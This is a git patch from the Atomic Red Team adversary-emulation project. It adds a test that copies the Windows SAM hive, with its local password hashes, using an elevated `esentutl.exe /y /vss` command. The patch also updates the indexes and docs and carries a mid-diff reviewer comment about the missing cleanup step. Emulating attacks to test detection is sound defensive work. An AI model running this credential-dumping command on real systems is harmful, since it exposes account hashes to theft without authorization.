From 5d59fdbce108bf3d146bf04f52fdd3e52ca7cd40 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Fri, 17 Jul 2020 15:13:28 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master
---
 atomics/Indexes/Indexes-CSV/index.csv | 1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 1 +
 atomics/Indexes/Indexes-Markdown/index.md | 1 +
 .../Indexes/Indexes-Markdown/windows-index.md | 1 +
 atomics/Indexes/index.yaml | 27 +++++++++++++++
 atomics/T1003.002/T1003.002.md | 34 +++++++++++++++++++
 atomics/T1003.002/T1003.002.yaml | 1 +
 atomics/used_guids.txt | 1 +
 8 files changed, 67 insertions(+)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index cc8c9365..5b3871ec 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -196,6 +196,7 @@ credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc
 credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
+credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
 defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
 defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 305a81be..793d9339 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -430,6 +430,7 @@ credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSp
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
+credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
 lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
 lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
 lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index ae021a8b..1c22c69d 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -419,6 +419,7 @@
 - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
 - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
 - Atomic Test #2: Registry parse with pypykatz [windows]
+ - Atomic Test #3: esentutl.exe SAM copy [windows]
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 01e868a2..7d885392 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -875,6 +875,7 @@ - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md) - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows] - Atomic Test #2: Registry parse with pypykatz [windows] + - Atomic Test #3: esentutl.exe SAM copy [windows] - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 0db39334..86f094f1 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -19346,6 +19346,33 @@ credential-access: executor: command: 'pypykatz live registry +' + name: command_prompt + elevation_required: true + - name: esentutl.exe SAM copy + auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480 + description: | + Copy the SAM hive using the esentutl.exe utility + This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc. + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the file to copy + type: Path + default: "%SystemRoot%/system32/config/SAM" + file_name: + description: Name of the copied file + type: String + default: SAM + copy_dest: + description: Destination of the copied file + type: String + default: "%windir%" + executor: + command: 'del #{copy_dest}\#{file_name} & esentutl.exe /y /vss #{file_path} + /d #{copy_dest}/#{file_name} + ' name: command_prompt elevation_required: true diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index af43cdbb..61b63f28 100644 
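Review bot: The `executor` of the new `esentutl.exe SAM copy` entry in the index.yaml hunk has no `cleanup_command`, so each run leaves a copy of the SAM hive at `#{copy_dest}\#{file_name}` (by default `%windir%\SAM`, which holds local account hashes) on the test host; the leading `del` only removes it at the start of the next run. index.yaml is generated output, so the fix belongs in atomics/T1003.002/T1003.002.yaml, whose hunk on this page only adds the guid and does not show the executor: add under `executor:` the line `cleanup_command: 'del #{copy_dest}\#{file_name} >nul 2>&1'`. The command also mixes separators, `del #{copy_dest}\#{file_name}` with a backslash against `/d #{copy_dest}/#{file_name}` and the default `file_path` with forward slashes; esentutl presumably accepts both, but using `\` throughout avoids relying on that.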
--- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -28,6 +28,8 @@ Notes: - [Atomic Test #2 - Registry parse with pypykatz](#atomic-test-2---registry-parse-with-pypykatz) +- [Atomic Test #3 - esentutl.exe SAM copy](#atomic-test-3---esentutlexe-sam-copy) +
@@ -117,4 +119,36 @@ pip3 install pypykatz +
+
+ +## Atomic Test #3 - esentutl.exe SAM copy +Copy the SAM hive using the esentutl.exe utility +This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_path | Path to the file to copy | Path | %SystemRoot%/system32/config/SAM| +| file_name | Name of the copied file | String | SAM| +| copy_dest | Destination of the copied file | String | %windir%| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +del #{copy_dest}\#{file_name} & esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} +``` + + + + + +
diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index 887d0a7a..ae3312a1 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -54,6 +54,7 @@ atomic_tests:
 name: command_prompt
 elevation_required: true
 - name: esentutl.exe SAM copy
+ auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480
 description: |
 Copy the SAM hive using the esentutl.exe utility
 This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index aba5a1bf..524b9d6a 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -548,3 +548,4 @@ d9841bf8-f161-4c73-81e9-fd773a5ff8c1
 0b19f4ee-de90-4059-88cb-63c800c683ed
 315f4be6-2240-4552-b3e1-d1047f5eecea
 a123ce6a-3916-45d6-ba9c-7d4081315c27
+a90c2f4d-6726-444e-99d2-a00cd7c20480